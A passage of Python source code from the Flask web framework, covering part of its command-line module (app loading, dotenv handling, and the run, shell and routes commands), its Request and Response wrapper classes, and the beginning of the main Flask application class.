'module:name'." " Module can be a dotted import or file path. Name is not required if it is" " 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to" " pass arguments." ), is_eager=True, expose_value=False, callback=_set_app, ) def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None: # If the flag isn't provided, it will default to False. Don't use # that, let debug be set by env in that case. source = ctx.get_parameter_source(param.name) # type: ignore[arg-type] if source is not None and source in ( ParameterSource.DEFAULT, ParameterSource.DEFAULT_MAP, ): return None # Set with env var instead of ScriptInfo.load so that it can be # accessed early during a factory function. 
os.environ["FLASK_DEBUG"] = "1" if value else "0" return value _debug_option = click.Option( ["--debug/--no-debug"], help="Set debug mode.", expose_value=False, callback=_set_debug, ) def _env_file_callback( ctx: click.Context, param: click.Option, value: str | None ) -> str | None: if value is None: return None import importlib try: importlib.import_module("dotenv") except ImportError: raise click.BadParameter( "python-dotenv must be installed to load an env file.", ctx=ctx, param=param, ) from None # Don't check FLASK_SKIP_DOTENV, that only disables automatically # loading .env and .flaskenv files. load_dotenv(value) return value # This option is eager so env vars are loaded as early as possible to be # used by other options. _env_file_option = click.Option( ["-e", "--env-file"], type=click.Path(exists=True, dir_okay=False), help="Load environment variables from this file. python-dotenv must be installed.", is_eager=True, expose_value=False, callback=_env_file_callback, ) class FlaskGroup(AppGroup): """Special subclass of the :class:`AppGroup` group that supports loading more commands from the configured Flask app. Normally a developer does not have to interface with this class but there are some very advanced use cases for which it makes sense to create an instance of this. see :ref:`custom-scripts`. :param add_default_commands: if this is True then the default run and shell commands will be added. :param add_version_option: adds the ``--version`` option. :param create_app: an optional callback that is passed the script info and returns the loaded app. :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` files to set environment variables. Will also change the working directory to the directory containing the first file found. :param set_debug_flag: Set the app's debug flag. .. versionchanged:: 2.2 Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options. .. versionchanged:: 2.2 An app context is pushed when running ``app.cli`` commands, so ``@with_appcontext`` is no longer required for those commands. .. versionchanged:: 1.0 If installed, python-dotenv will be used to load environment variables from :file:`.env` and :file:`.flaskenv` files. """ def __init__( self, add_default_commands: bool = True, create_app: t.Callable[..., Flask] | None = None, add_version_option: bool = True, load_dotenv: bool = True, set_debug_flag: bool = True, **extra: t.Any, ) -> None: params = list(extra.pop("params", None) or ()) # Processing is done with option callbacks instead of a group # callback. This allows users to make a custom group callback # without losing the behavior. --env-file must come first so # that it is eagerly evaluated before --app. params.extend((_env_file_option, _app_option, _debug_option)) if add_version_option: params.append(version_option) if "context_settings" not in extra: extra["context_settings"] = {} extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK") super().__init__(params=params, **extra) self.create_app = create_app self.load_dotenv = load_dotenv self.set_debug_flag = set_debug_flag if add_default_commands: self.add_command(run_command) self.add_command(shell_command) self.add_command(routes_command) self._loaded_plugin_commands = False def _load_plugin_commands(self) -> None: if self._loaded_plugin_commands: return if sys.version_info >= (3, 10): from importlib import metadata else: # Use a backport on Python < 3.10. 
We technically have # importlib.metadata on 3.8+, but the API changed in 3.10, # so use the backport for consistency. import importlib_metadata as metadata for ep in metadata.entry_points(group="flask.commands"): self.add_command(ep.load(), ep.name) self._loaded_plugin_commands = True def get_command(self, ctx: click.Context, name: str) -> click.Command | None: self._load_plugin_commands() # Look up built-in and plugin commands, which should be # available even if the app fails to load. rv = super().get_command(ctx, name) if rv is not None: return rv info = ctx.ensure_object(ScriptInfo) # Look up commands provided by the app, showing an error and # continuing if the app couldn't be loaded. try: app = info.load_app() except NoAppException as e: click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") return None # Push an app context for the loaded app unless it is already # active somehow. This makes the context available to parameter # and command callbacks without needing @with_appcontext. if not current_app or current_app._get_current_object() is not app: # type: ignore[attr-defined] ctx.with_resource(app.app_context()) return app.cli.get_command(ctx, name) def list_commands(self, ctx: click.Context) -> list[str]: self._load_plugin_commands() # Start with the built-in and plugin commands. rv = set(super().list_commands(ctx)) info = ctx.ensure_object(ScriptInfo) # Add commands provided by the app, showing an error and # continuing if the app couldn't be loaded. try: rv.update(info.load_app().cli.list_commands(ctx)) except NoAppException as e: # When an app couldn't be loaded, show the error message # without the traceback. click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") except Exception: # When any other errors occurred during loading, show the # full traceback. click.secho(f"{traceback.format_exc()}\n", err=True, fg="red") return sorted(rv) def make_context( self, info_name: str | None, args: list[str], parent: click.Context | None = None, **extra: t.Any, ) -> click.Context: # Set a flag to tell app.run to become a no-op. If app.run was # not in a __name__ == __main__ guard, it would start the server # when importing, blocking whatever command is being called. os.environ["FLASK_RUN_FROM_CLI"] = "true" # Attempt to load .env and .flask env files. The --env-file # option can cause another file to be loaded. if get_load_dotenv(self.load_dotenv): load_dotenv() if "obj" not in extra and "obj" not in self.context_settings: extra["obj"] = ScriptInfo( create_app=self.create_app, set_debug_flag=self.set_debug_flag ) return super().make_context(info_name, args, parent=parent, **extra) def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]: if not args and self.no_args_is_help: # Attempt to load --env-file and --app early in case they # were given as env vars. Otherwise no_args_is_help will not # see commands from app.cli. _env_file_option.handle_parse_result(ctx, {}, []) _app_option.handle_parse_result(ctx, {}, []) return super().parse_args(ctx, args) def _path_is_ancestor(path: str, other: str) -> bool: """Take ``other`` and remove the length of ``path`` from it. Then join it to ``path``. If it is the original value, ``path`` is an ancestor of ``other``.""" return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other def load_dotenv(path: str | os.PathLike[str] | None = None) -> bool: """Load "dotenv" files in order of precedence to set environment variables. 
If an env var is already set it is not overwritten, so earlier files in the list are preferred over later files. This is a no-op if `python-dotenv`_ is not installed. .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme :param path: Load the file at this location instead of searching. :return: ``True`` if a file was loaded. .. versionchanged:: 2.0 The current directory is not changed to the location of the loaded file. .. versionchanged:: 2.0 When loading the env files, set the default encoding to UTF-8. .. versionchanged:: 1.1.0 Returns ``False`` when python-dotenv is not installed, or when the given path isn't a file. .. versionadded:: 1.0 """ try: import dotenv except ImportError: if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"): click.secho( " * Tip: There are .env or .flaskenv files present." ' Do "pip install python-dotenv" to use them.', fg="yellow", err=True, ) return False # Always return after attempting to load a given path, don't load # the default files. if path is not None: if os.path.isfile(path): return dotenv.load_dotenv(path, encoding="utf-8") return False loaded = False for name in (".env", ".flaskenv"): path = dotenv.find_dotenv(name, usecwd=True) if not path: continue dotenv.load_dotenv(path, encoding="utf-8") loaded = True return loaded # True if at least one file was located and loaded. def show_server_banner(debug: bool, app_import_path: str | None) -> None: """Show extra startup messages the first time the server is run, ignoring the reloader. """ if is_running_from_reloader(): return if app_import_path is not None: click.echo(f" * Serving Flask app '{app_import_path}'") if debug is not None: click.echo(f" * Debug mode: {'on' if debug else 'off'}") class CertParamType(click.ParamType): """Click option type for the ``--cert`` option. Allows either an existing file, the string ``'adhoc'``, or an import for a :class:`~ssl.SSLContext` object. """ name = "path" def __init__(self) -> None: self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True) def convert( self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None ) -> t.Any: try: import ssl except ImportError: raise click.BadParameter( 'Using "--cert" requires Python to be compiled with SSL support.', ctx, param, ) from None try: return self.path_type(value, param, ctx) except click.BadParameter: value = click.STRING(value, param, ctx).lower() if value == "adhoc": try: import cryptography # noqa: F401 except ImportError: raise click.BadParameter( "Using ad-hoc certificates requires the cryptography library.", ctx, param, ) from None return value obj = import_string(value, silent=True) if isinstance(obj, ssl.SSLContext): return obj raise def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any: """The ``--key`` option must be specified when ``--cert`` is a file. Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed. 
""" cert = ctx.params.get("cert") is_adhoc = cert == "adhoc" try: import ssl except ImportError: is_context = False else: is_context = isinstance(cert, ssl.SSLContext) if value is not None: if is_adhoc: raise click.BadParameter( 'When "--cert" is "adhoc", "--key" is not used.', ctx, param ) if is_context: raise click.BadParameter( 'When "--cert" is an SSLContext object, "--key" is not used.', ctx, param, ) if not cert: raise click.BadParameter('"--cert" must also be specified.', ctx, param) ctx.params["cert"] = cert, value else: if cert and not (is_adhoc or is_context): raise click.BadParameter('Required when using "--cert".', ctx, param) return value class SeparatedPathType(click.Path): """Click option type that accepts a list of values separated by the OS's path separator (``:``, ``;`` on Windows). Each value is validated as a :class:`click.Path` type. """ def convert( self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None ) -> t.Any: items = self.split_envvar_value(value) # can't call no-arg super() inside list comprehension until Python 3.12 super_convert = super().convert return [super_convert(item, param, ctx) for item in items] @click.command("run", short_help="Run a development server.") @click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.") @click.option("--port", "-p", default=5000, help="The port to bind to.") @click.option( "--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS.", is_eager=True, ) @click.option( "--key", type=click.Path(exists=True, dir_okay=False, resolve_path=True), callback=_validate_key, expose_value=False, help="The key file to use when specifying a certificate.", ) @click.option( "--reload/--no-reload", default=None, help="Enable or disable the reloader. By default the reloader " "is active if debug is enabled.", ) @click.option( "--debugger/--no-debugger", default=None, help="Enable or disable the debugger. By default the debugger " "is active if debug is enabled.", ) @click.option( "--with-threads/--without-threads", default=True, help="Enable or disable multithreading.", ) @click.option( "--extra-files", default=None, type=SeparatedPathType(), help=( "Extra files that trigger a reload on change. Multiple paths" f" are separated by {os.path.pathsep!r}." ), ) @click.option( "--exclude-patterns", default=None, type=SeparatedPathType(), help=( "Files matching these fnmatch patterns will not trigger a reload" " on change. Multiple patterns are separated by" f" {os.path.pathsep!r}." ), ) @pass_script_info def run_command( info: ScriptInfo, host: str, port: int, reload: bool, debugger: bool, with_threads: bool, cert: ssl.SSLContext | tuple[str, str | None] | t.Literal["adhoc"] | None, extra_files: list[str] | None, exclude_patterns: list[str] | None, ) -> None: """Run a local development server. This server is for development purposes only. It does not provide the stability, security, or performance of production WSGI servers. The reloader and debugger are enabled by default with the '--debug' option. """ try: app: WSGIApplication = info.load_app() except Exception as e: if is_running_from_reloader(): # When reloading, print out the error immediately, but raise # it later so the debugger or server can handle it. traceback.print_exc() err = e def app( environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: raise err from None else: # When not reloading, raise the error immediately so the # command fails. 
raise e from None debug = get_debug_flag() if reload is None: reload = debug if debugger is None: debugger = debug show_server_banner(debug, info.app_import_path) run_simple( host, port, app, use_reloader=reload, use_debugger=debugger, threaded=with_threads, ssl_context=cert, extra_files=extra_files, exclude_patterns=exclude_patterns, ) run_command.params.insert(0, _debug_option) @click.command("shell", short_help="Run a shell in the app context.") @with_appcontext def shell_command() -> None: """Run an interactive Python shell in the context of a given Flask application. The application will populate the default namespace of this shell according to its configuration. This is useful for executing small snippets of management code without having to manually configure the application. """ import code banner = ( f"Python {sys.version} on {sys.platform}\n" f"App: {current_app.import_name}\n" f"Instance: {current_app.instance_path}" ) ctx: dict[str, t.Any] = {} # Support the regular Python interpreter startup script if someone # is using it. startup = os.environ.get("PYTHONSTARTUP") if startup and os.path.isfile(startup): with open(startup) as f: eval(compile(f.read(), startup, "exec"), ctx) ctx.update(current_app.make_shell_context()) # Site, customize, or startup script can set a hook to call when # entering interactive mode. The default one sets up readline with # tab and history completion. interactive_hook = getattr(sys, "__interactivehook__", None) if interactive_hook is not None: try: import readline from rlcompleter import Completer except ImportError: pass else: # rlcompleter uses __main__.__dict__ by default, which is # flask.__main__. Use the shell context instead. readline.set_completer(Completer(ctx).complete) interactive_hook() code.interact(banner=banner, local=ctx) @click.command("routes", short_help="Show the routes for the app.") @click.option( "--sort", "-s", type=click.Choice(("endpoint", "methods", "domain", "rule", "match")), default="endpoint", help=( "Method to sort routes by. 'match' is the order that Flask will match routes" " when dispatching a request." ), ) @click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.") @with_appcontext def routes_command(sort: str, all_methods: bool) -> None: """Show all registered routes with endpoints and methods.""" rules = list(current_app.url_map.iter_rules()) if not rules: click.echo("No routes were registered.") return ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"} host_matching = current_app.url_map.host_matching has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules) rows = [] for rule in rules: row = [ rule.endpoint, ", ".join(sorted((rule.methods or set()) - ignored_methods)), ] if has_domain: row.append((rule.host if host_matching else rule.subdomain) or "") row.append(rule.rule) rows.append(row) headers = ["Endpoint", "Methods"] sorts = ["endpoint", "methods"] if has_domain: headers.append("Host" if host_matching else "Subdomain") sorts.append("domain") headers.append("Rule") sorts.append("rule") try: rows.sort(key=itemgetter(sorts.index(sort))) except ValueError: pass rows.insert(0, headers) widths = [max(len(row[i]) for row in rows) for i in range(len(headers))] rows.insert(1, ["-" * w for w in widths]) template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths)) for row in rows: click.echo(template.format(*row)) cli = FlaskGroup( name="flask", help="""\ A general utility script for Flask applications. 
An application to load must be given with the '--app' option, 'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file in the current directory. """, ) def main() -> None: cli.main() if __name__ == "__main__": main() File: src/flask/wrappers.py from __future__ import annotations import typing as t from werkzeug.exceptions import BadRequest from werkzeug.exceptions import HTTPException from werkzeug.wrappers import Request as RequestBase from werkzeug.wrappers import Response as ResponseBase from . import json from .globals import current_app from .helpers import _split_blueprint_path if t.TYPE_CHECKING: # pragma: no cover from werkzeug.routing import Rule class Request(RequestBase): """The request object used by default in Flask. Remembers the matched endpoint and view arguments. It is what ends up as :class:`~flask.request`. If you want to replace the request object used you can subclass this and set :attr:`~flask.Flask.request_class` to your subclass. The request object is a :class:`~werkzeug.wrappers.Request` subclass and provides all of the attributes Werkzeug defines plus a few Flask specific ones. """ json_module: t.Any = json #: The internal URL rule that matched the request. This can be #: useful to inspect which methods are allowed for the URL from #: a before/after handler (``request.url_rule.methods``) etc. #: Though if the request's method was invalid for the URL rule, #: the valid list is available in ``routing_exception.valid_methods`` #: instead (an attribute of the Werkzeug exception #: :exc:`~werkzeug.exceptions.MethodNotAllowed`) #: because the request was never internally bound. #: #: .. versionadded:: 0.6 url_rule: Rule | None = None #: A dict of view arguments that matched the request. If an exception #: happened when matching, this will be ``None``. view_args: dict[str, t.Any] | None = None #: If matching the URL failed, this is the exception that will be #: raised / was raised as part of the request handling. This is #: usually a :exc:`~werkzeug.exceptions.NotFound` exception or #: something similar. routing_exception: HTTPException | None = None @property def max_content_length(self) -> int | None: # type: ignore[override] """Read-only view of the ``MAX_CONTENT_LENGTH`` config key.""" if current_app: return current_app.config["MAX_CONTENT_LENGTH"] # type: ignore[no-any-return] else: return None @property def endpoint(self) -> str | None: """The endpoint that matched the request URL. This will be ``None`` if matching failed or has not been performed yet. This in combination with :attr:`view_args` can be used to reconstruct the same URL or a modified URL. """ if self.url_rule is not None: return self.url_rule.endpoint # type: ignore[no-any-return] return None @property def blueprint(self) -> str | None: """The registered name of the current blueprint. This will be ``None`` if the endpoint is not part of a blueprint, or if URL matching failed or has not been performed yet. This does not necessarily match the name the blueprint was created with. It may have been nested, or registered with a different name. """ endpoint = self.endpoint if endpoint is not None and "." in endpoint: return endpoint.rpartition(".")[0] return None @property def blueprints(self) -> list[str]: """The registered names of the current blueprint upwards through parent blueprints. This will be an empty list if there is no current blueprint, or if URL matching failed. .. 
versionadded:: 2.0.1 """ name = self.blueprint if name is None: return [] return _split_blueprint_path(name) def _load_form_data(self) -> None: super()._load_form_data() # In debug mode we're replacing the files multidict with an ad-hoc # subclass that raises a different error for key errors. if ( current_app and current_app.debug and self.mimetype != "multipart/form-data" and not self.files ): from .debughelpers import attach_enctype_error_multidict attach_enctype_error_multidict(self) def on_json_loading_failed(self, e: ValueError | None) -> t.Any: try: return super().on_json_loading_failed(e) except BadRequest as e: if current_app and current_app.debug: raise raise BadRequest() from e class Response(ResponseBase): """The response object that is used by default in Flask. Works like the response object from Werkzeug but is set to have an HTML mimetype by default. Quite often you don't have to create this object yourself because :meth:`~flask.Flask.make_response` will take care of that for you. If you want to replace the response object used you can subclass this and set :attr:`~flask.Flask.response_class` to your subclass. .. versionchanged:: 1.0 JSON support is added to the response, like the request. This is useful when testing to get the test client response data as JSON. .. versionchanged:: 1.0 Added :attr:`max_cookie_size`. """ default_mimetype: str | None = "text/html" json_module = json autocorrect_location_header = False @property def max_cookie_size(self) -> int: # type: ignore """Read-only view of the :data:`MAX_COOKIE_SIZE` config key. See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in Werkzeug's docs. """ if current_app: return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return] # return Werkzeug's default when not in an app context return super().max_cookie_size File: src/flask/app.py from __future__ import annotations import collections.abc as cabc import os import sys import typing as t import weakref from datetime import timedelta from inspect import iscoroutinefunction from itertools import chain from types import TracebackType from urllib.parse import quote as _url_quote import click from werkzeug.datastructures import Headers from werkzeug.datastructures import ImmutableDict from werkzeug.exceptions import BadRequestKeyError from werkzeug.exceptions import HTTPException from werkzeug.exceptions import InternalServerError from werkzeug.routing import BuildError from werkzeug.routing import MapAdapter from werkzeug.routing import RequestRedirect from werkzeug.routing import RoutingException from werkzeug.routing import Rule from werkzeug.serving import is_running_from_reloader from werkzeug.wrappers import Response as BaseResponse from . import cli from . 
import typing as ft from .ctx import AppContext from .ctx import RequestContext from .globals import _cv_app from .globals import _cv_request from .globals import current_app from .globals import g from .globals import request from .globals import request_ctx from .globals import session from .helpers import get_debug_flag from .helpers import get_flashed_messages from .helpers import get_load_dotenv from .helpers import send_from_directory from .sansio.app import App from .sansio.scaffold import _sentinel from .sessions import SecureCookieSessionInterface from .sessions import SessionInterface from .signals import appcontext_tearing_down from .signals import got_request_exception from .signals import request_finished from .signals import request_started from .signals import request_tearing_down from .templating import Environment from .wrappers import Request from .wrappers import Response if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import StartResponse from _typeshed.wsgi import WSGIEnvironment from .testing import FlaskClient from .testing import FlaskCliRunner T_shell_context_processor = t.TypeVar( "T_shell_context_processor", bound=ft.ShellContextProcessorCallable ) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) def _make_timedelta(value: timedelta | int | None) -> timedelta | None: if value is None or isinstance(value, timedelta): return value return timedelta(seconds=value) class Flask(App): """The flask object implements a WSGI application and acts as the central object. It is passed the name of the module or package of the application. Once it is created it will act as a central registry for the view functions, the URL rules, template configuration and much more. The name of the package is used to resolve resources from inside the package or the folder the module is contained in depending on if the package parameter resolves to an actual python package (a folder with an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). For more information about resource loading, see :func:`open_resource`. Usually you create a :class:`Flask` instance in your main module or in the :file:`__init__.py` file of your package like this:: from flask import Flask app = Flask(__name__) .. admonition:: About the First Parameter The idea of the first parameter is to give Flask an idea of what belongs to your application. This name is used to find resources on the filesystem, can be used by extensions to improve debugging information and a lot more. So it's important what you provide there. If you are using a single module, `__name__` is always the correct value. If you however are using a package, it's usually recommended to hardcode the name of your package there. For example if your application is defined in :file:`yourapplication/app.py` you should create it with one of the two versions below:: app = Flask('yourapplication') app = Flask(__name__.split('.')[0]) Why is that? The application will work even with `__name__`, thanks to how resources are looked up. However it will make debugging more painful. Certain extensions can make assumptions based on the import name of your application. 
For example the Flask-SQLAlchemy extension will look for the code in your application that triggered an SQL query in debug mode. If the import name is not properly set up, that debugging information is lost. (For example it would only pick up SQL queries in `yourapplication.app` and not `yourapplication.views.frontend`) .. versionadded:: 0.7 The `static_url_path`, `static_folder`, and `template_folder` parameters were added. .. versionadded:: 0.8 The `instance_path` and `instance_relative_config` parameters were added. .. versionadded:: 0.11 The `root_path` parameter was added. .. versionadded:: 1.0 The ``host_matching`` and ``static_host`` parameters were added. .. versionadded:: 1.0 The ``subdomain_matching`` parameter was added. Subdomain matching needs to be enabled manually now. Setting :data:`SERVER_NAME` does not implicitly enable it. :param import_name: the name of the application package :param static_url_path: can be used to specify a different path for the static files on the web. Defaults to the name of the `static_folder` folder. :param static_folder: The folder with static files that is served at ``static_url_path``. Relative to the application ``root_path`` or an absolute path. Defaults to ``'static'``. :param static_host: the host to use when adding the static route. Defaults to None. Required when using ``host_matching=True`` with a ``static_folder`` configured. :param host_matching: set ``url_map.host_matching`` attribute. Defaults to False. :param subdomain_matching: consider the subdomain relative to :data:`SERVER_NAME` when matching routes. Defaults to False. :param template_folder: the folder that contains the templates that should be used by the application. Defaults to ``'templates'`` folder in the root path of the application. :param instance_path: An alternative instance path for the application. By default the folder ``'instance'`` next to the package or module is assumed to be the instance path. :param instance_relative_config: if set to ``True`` relative filenames for loading the config are assumed to be relative to the instance path instead of the application root. :param root_path: The path to the root of the application files. This should only be set manually when it can't be detected automatically, such as for namespace packages. """ default_config = ImmutableDict( { "DEBUG": None, "TESTING": False, "PROPAGATE_EXCEPTIONS": None, "SECRET_KEY": None, "PERMANENT_SESSION_LIFETIME": timedelta(days=31), "USE_X_SENDFILE": False, "SERVER_NAME": None, "APPLICATION_ROOT": "/", "SESSION_COOKIE_NAME": "session", "SESSION_COOKIE_DOMAIN": None, "SESSION_COOKIE_PATH": None, "SESSION_COOKIE_HTTPONLY": True, "SESSION_COOKIE_SECURE": False, "SESSION_COOKIE_SAMESITE": None, "SESSION_REFRESH_EACH_REQUEST": True, "MAX_CONTENT_LENGTH": None, "SEND_FILE_MAX_AGE_DEFAULT": None, "TRAP_BAD_REQUEST_ERRORS": None, "TRAP_HTTP_EXCEPTIONS": False, "EXPLAIN_TEMPLATE_LOADING": False, "PREFERRED_URL_SCHEME": "http", "TEMPLATES_AUTO_RELOAD": None, "MAX_COOKIE_SIZE": 4093, "PROVIDE_AUTOMATIC_OPTIONS": True, } ) #: The class that is used for request objects. See :class:`~flask.Request` #: for more information. request_class: type[Request] = Request #: The class that is used for response objects. See #: :class:`~flask.Response` for more information. response_class: type[Response] = Response #: the session interface to use. By default an instance of #: :class:`~flask.sessions.SecureCookieSessionInterface` is used here. #: #: .. 
versionadded:: 0.8 session_interface: SessionInterface = SecureCookieSessionInterface() def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike[str] | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, template_folder: str | os.PathLike[str] | None = "templates", instance_path: str | None = None, instance_relative_config: bool = False, root_path: str | None = None, ): super().__init__( import_name=import_name, static_url_path=static_url_path, static_folder=static_folder, static_host=static_host, host_matching=host_matching, subdomain_matching=subdomain_matching, template_folder=template_folder, instance_path=instance_path, instance_relative_config=instance_relative_config, root_path=root_path, ) #: The Click command group for registering CLI commands for this #: object. The commands are available from the ``flask`` command #: once the application has been discovered and blueprints have #: been registered. self.cli = cli.AppGroup() # Set the name of the Click group in case someone wants to add # the app's commands to another CLI tool. self.cli.name = self.name # Add a static route using the provided static_url_path, static_host, # and static_folder if there is a configured static_folder. # Note we do this without checking if static_folder exists. # For one, it might be created while the server is running (e.g. during # development). Also, Google App Engine stores static files somewhere if self.has_static_folder: assert ( bool(static_host) == host_matching ), "Invalid static_host/host_matching combination" # Use a weakref to avoid creating a reference cycle between the app # and the view function (see #3761). self_ref = weakref.ref(self) self.add_url_rule( f"{self.static_url_path}/<path:filename>", endpoint="static", host=static_host, view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 ) def get_send_file_max_age(self, filename: str | None) -> int | None: """Used by :func:`send_file` to determine the ``max_age`` cache value for a given file path if it wasn't passed. By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from the configuration of :data:`~flask.current_app`. This defaults to ``None``, which tells the browser to use conditional requests instead of a timed cache, which is usually preferable. Note this is a duplicate of the same method in the Flask class. .. versionchanged:: 2.0 The default configuration is ``None`` instead of 12 hours. .. versionadded:: 0.9 """ value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] if value is None: return None if isinstance(value, timedelta): return int(value.total_seconds()) return value # type: ignore[no-any-return] def send_static_file(self, filename: str) -> Response: """The view function used to serve files from :attr:`static_folder`. A route is automatically registered for this view at :attr:`static_url_path` if :attr:`static_folder` is set. Note this is a duplicate of the same method in the Flask class. .. versionadded:: 0.5 """ if not self.has_static_folder: raise RuntimeError("'static_folder' must be set to serve static_files.") # send_file only knows to call get_send_file_max_age on the app, # call it here so it works for blueprints too. 
max_age = self.get_send_file_max_age(filename) return send_from_directory( t.cast(str, self.static_folder), filename, max_age=max_age ) def open_resource( self, resource: str, mode: str = "rb", encoding: str | None = None ) -> t.IO[t.AnyStr]: """Open a resource file relative to :attr:`root_path` for reading. For example, if the file ``schema.sql`` is next to the file ``app.py`` where the ``Flask`` app is defined, it can be opened with: .. code-block:: python with app.open_resource("schema.sql") as f: conn.executescript(f.read()) :param resource: Path to the resource relative to :attr:`root_path`. :param mode: Open the file in this mode. Only reading is supported, valid values are ``"r"`` (or ``"rt"``) and ``"rb"``. :param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ if mode not in {"r", "rt", "rb"}: raise ValueError("Resources can only be opened for reading.") path = os.path.join(self.root_path, resource) if mode == "rb": return open(path, mode) return open(path, mode, encoding=encoding) def open_instance_resource( self, resource: str, mode: str = "rb", encoding: str | None = "utf-8" ) -> t.IO[t.AnyStr]: """Open a resource file relative to the application's instance folder :attr:`instance_path`. Unlike :meth:`open_resource`, files in the instance folder can be opened for writing. :param resource: Path to the resource relative to :attr:`instance_path`. :param mode: Open the file in this mode. :param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ path = os.path.join(self.instance_path, resource) if "b" in mode: return open(path, mode) return open(path, mode, encoding=encoding) def create_jinja_environment(self) -> Environment: """Create the Jinja environment based on :attr:`jinja_options` and the various Jinja-related methods of the app. Changing :attr:`jinja_options` after this will have no effect. Also adds Flask-related globals and filters to the environment. .. versionchanged:: 0.11 ``Environment.auto_reload`` set in accordance with ``TEMPLATES_AUTO_RELOAD`` configuration option. .. versionadded:: 0.5 """ options = dict(self.jinja_options) if "autoescape" not in options: options["autoescape"] = self.select_jinja_autoescape if "auto_reload" not in options: auto_reload = self.config["TEMPLATES_AUTO_RELOAD"] if auto_reload is None: auto_reload = self.debug options["auto_reload"] = auto_reload rv = self.jinja_environment(self, **options) rv.globals.update( url_for=self.url_for, get_flashed_messages=get_flashed_messages, config=self.config, # request, session and g are normally added with the # context processor for efficiency reasons but for imported # templates we also want the proxies in there. request=request, session=session, g=g, ) rv.policies["json.dumps_function"] = self.json.dumps return rv def create_url_adapter(self, request: Request | None) -> MapAdapter | None: """Creates a URL adapter for the given request. The URL adapter is created at a point where the request context is not yet set up so the request is passed explicitly. .. versionadded:: 0.6 .. versionchanged:: 0.9 This can now also be called without a request object when the URL adapter is created for the application context. .. versionchanged:: 1.0 :data:`SERVER_NAME` no longer implicitly enables subdomain matching. Use :attr:`subdomain_matching` instead. 
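
        For illustration, creating an adapter outside of a request relies on
        ``SERVER_NAME`` being configured (the hostname below is only a
        placeholder)::

            app.config["SERVER_NAME"] = "example.test"
            adapter = app.create_url_adapter(None)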
""" if request is not None: # If subdomain matching is disabled (the default), use the # default subdomain in all cases. This should be the default # in Werkzeug but it currently does not have that feature. if not self.subdomain_matching: subdomain = self.url_map.default_subdomain or None else: subdomain = None return self.url_map.bind_to_environ( request.environ, server_name=self.config["SERVER_NAME"], subdomain=subdomain, ) # We need at the very least the server name to be set for this # to work. if self.config["SERVER_NAME"] is not None: return self.url_map.bind( self.config["SERVER_NAME"], script_name=self.config["APPLICATION_ROOT"], url_scheme=self.config["PREFERRED_URL_SCHEME"], ) return None def raise_routing_exception(self, request: Request) -> t.NoReturn: """Intercept routing exceptions and possibly do something else. In debug mode, intercept a routing redirect and replace it with an error if the body will be discarded. With modern Werkzeug this shouldn't occur, since it now uses a 308 status which tells the browser to resend the method and body. .. versionchanged:: 2.1 Don't intercept 307 and 308 redirects. :meta private: :internal: """ if ( not self.debug or not isinstance(request.routing_exception, RequestRedirect) or request.routing_exception.code in {307, 308} or request.method in {"GET", "HEAD", "OPTIONS"} ): raise request.routing_exception # type: ignore[misc] from .debughelpers import FormDataRoutingRedirect raise FormDataRoutingRedirect(request) def update_template_context(self, context: dict[str, t.Any]) -> None: """Update the template context with some commonly used variables. This injects request, session, config and g into the template context as well as everything template context processors want to inject. Note that the as of Flask 0.6, the original values in the context will not be overridden if a context processor decides to return a value with the same key. :param context: the context as a dictionary that is updated in place to add extra variables. """ names: t.Iterable[str | None] = (None,) # A template may be rendered outside a request context. if request: names = chain(names, reversed(request.blueprints)) # The values passed to render_template take precedence. Keep a # copy to re-apply after all context functions. orig_ctx = context.copy() for name in names: if name in self.template_context_processors: for func in self.template_context_processors[name]: context.update(self.ensure_sync(func)()) context.update(orig_ctx) def make_shell_context(self) -> dict[str, t.Any]: """Returns the shell context for an interactive shell for this application. This runs all the registered shell context processors. .. versionadded:: 0.11 """ rv = {"app": self, "g": g} for processor in self.shell_context_processors: rv.update(processor()) return rv def run( self, host: str | None = None, port: int | None = None, debug: bool | None = None, load_dotenv: bool = True, **options: t.Any, ) -> None: """Runs the application on a local development server. Do not use ``run()`` in a production setting. It is not intended to meet security and performance requirements for a production server. Instead, see :doc:`/deploying/index` for WSGI server recommendations. If the :attr:`debug` flag is set the server will automatically reload for code changes and show a debugger in case an exception happened. If you want to run the 